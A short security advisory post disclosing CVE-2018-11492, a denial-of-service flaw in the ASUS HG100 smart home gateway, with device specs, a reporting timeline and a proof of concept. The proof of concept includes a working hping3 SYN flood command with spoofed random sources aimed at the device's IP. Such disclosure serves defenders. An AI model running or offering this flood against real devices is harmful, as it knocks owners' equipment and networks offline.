CVE ASUS NCCST

CVE-2018-11492

ASUS HG100 exists DoS vulnerability

Posted by Mars Cheng on July 25, 2018

Description:ASUS HG100 devices allow denial of service via an IPv4 packet flood.

This vulnerability was discovered by Mars Cheng at National Center for Cyber Security Technology (NCCST)


Introduction ASUS HG100 SmartHome GateWay

Length x width x height Weight Wireless connection
152 x 67 x 167 mm 256g WiFi 802.11b/g/n ; ZigBee PRO ; BlueTooth 4.0

Proof of Concept

1.Connect to ASUS Gateway HG100 with ADB

adb connect 192.168.0.108
adb shell

2.Execute IP v4 flood attack

  • Use Hping3 tool to execute DoS attack 
    hping3 -V -c 1000000 -d 120 -S -w 64 --flood --rand-source 192.168.0.108
  • Confirm packets status

3.Confirm device status

  • Unable to connect to ADB, and DoS attack success.

Timeline

  • February 6, 2018 Reported to ASUS Security

Reference

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11492